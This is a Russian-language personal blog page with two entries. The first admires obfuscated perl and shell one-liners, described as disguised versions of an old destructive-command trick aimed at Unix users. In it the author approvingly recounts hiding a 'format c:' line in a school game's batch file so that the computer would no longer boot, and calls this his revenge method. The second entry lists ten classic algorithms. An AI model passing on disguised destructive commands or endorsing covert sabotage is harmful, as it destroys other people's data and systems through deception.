February 10th, 2008

07:00 pm
Изящные строчки.

На ЛОРе нашёл старую-старую, но замечательную тему. Как только уже не маскировали эту старую разводку для *никсоидов %) Вот два варианта, которые я прямо там нашёл:

perl -e '$??s:;s:s;;$?::s;;=]=>%-{<-|}<&|`{;;y; -/:-@[-`{-};`-{/" -;;s;;$_;see'
ISF=$(echo '%\%#{<-{}<&{`' |tr ' -/:-@[-`{}' '`-{/ -');$ISF 2>/dev/null

Вспомнилось, как я в школе на информатике прикалывался. Но там была венда 98 (читай, ДОС), и таких возможностей ниибацца шифрования не было. Я делал хитрее - находил какую-нибудь игру, которая запускалась через батник, и куда-нибудь в этот батник записывал
echo format c: /u /autotest > c:\autoexec.bat

А потом, через пару недель, кто-нибудь в эту игру решал поиграть, после чего почему-то комп больше не загружался. Странно, и с чего бы это?

Не, вообще я человек не злой, просто тогда на информатике училка сильно задолбала. Кстати, хороший урок для всех моих врагов - я обычно так и действую, методом "спящей мины". И если меня кто-то обидит, возмездие ему/ей придёт обязательно, притом с совершенно неожиданной стороны.

А по собственно посту - я офигел просто. Какие-то люди пишут: я, мол, админ сервера, у меня полгорода абонентов, а из-за твоего скрипта у меня теперь всё слетело и окно часов на 8... Не, возможно, конечно, это кто-то просто понтуется, но, блин, если и в самом деле есть админы, готовые запускать чорт знает что на сервере, у которого полгорода абонентов, да ещё и под рутом... Как-то мрачно это...

ЗЫ: Кстати, у меня find / -perm 777 выдал немеряную тучу файлов. Притом не только в /home и других моих помойках, но и в /etc и /usr... Мне как-то даже дискомфортно стало от этого. Это надо так, или какой-то глюк? Может быть имеет смысл как-нибудь перевести их все в 700? Или что-то от этого работать перестанет?

Да, а если просто защитить (поставить chmod 100, скажем, или 111) все подкаталоги /, это спасёт от rm -rf /? То есть, если rm не имеет права доступа к каталогу, он туда не полезет?

ЗЗЫ: А ещё там на ЛОРе говорили про какие-то инструменты, позволяющие восстановить данные, убитые rm. Это и в самом деле существует? Мне бы пригодились...

09:49 pm
Algorithms for the Ages

http://oldweb.cecm.sfu.ca/personal/jborwein/algorithms.html

"Great algorithms are the poetry of computation," says Francis Sullivan of the Institute for Defense Analyses' Center for Computing Sciences in Bowie, Maryland. He and Jack Dongarra of the University of Tennessee and Oak Ridge National Laboratory have put together a sampling that might have made Robert Frost beam with pride--had the poet been a computer jock. Their list of 10 algorithms having "the greatest influence on the development and practice of science and engineering in the 20th century" appears in the January/February issue of Computing in Science & Engineering. If you use a computer, some of these algorithms are no doubt crunching your data as you read this. The drum roll, please:

  • 1946: The Metropolis Algorithm for Monte Carlo. Through the use of random processes, this algorithm offers an efficient way to stumble toward answers to problems that are too complicated to solve exactly.
  • 1947: Simplex Method for Linear Programming. An elegant solution to a common problem in planning and decision-making.
  • 1950: Krylov Subspace Iteration Method. A technique for rapidly solving the linear equations that abound in scientific computation.
  • 1951: The Decompositional Approach to Matrix Computations. A suite of techniques for numerical linear algebra.
  • 1957: The Fortran Optimizing Compiler. Turns high-level code into efficient computer-readable code.
  • 1959: QR Algorithm for Computing Eigenvalues. Another crucial matrix operation made swift and practical.
  • 1962: Quicksort Algorithms for Sorting. For the efficient handling of large databases.
  • 1965: Fast Fourier Transform. Perhaps the most ubiquitous algorithm in use today, it breaks down waveforms (like sound) into periodic components.
  • 1977: Integer Relation Detection. A fast method for spotting simple equations satisfied by collections of seemingly unrelated numbers.
  • 1987: Fast Multipole Method. A breakthrough in dealing with the complexity of n-body calculations, applied in problems ranging from celestial mechanics to protein folding.

    From Random Samples, Science page 799, February 4, 2000.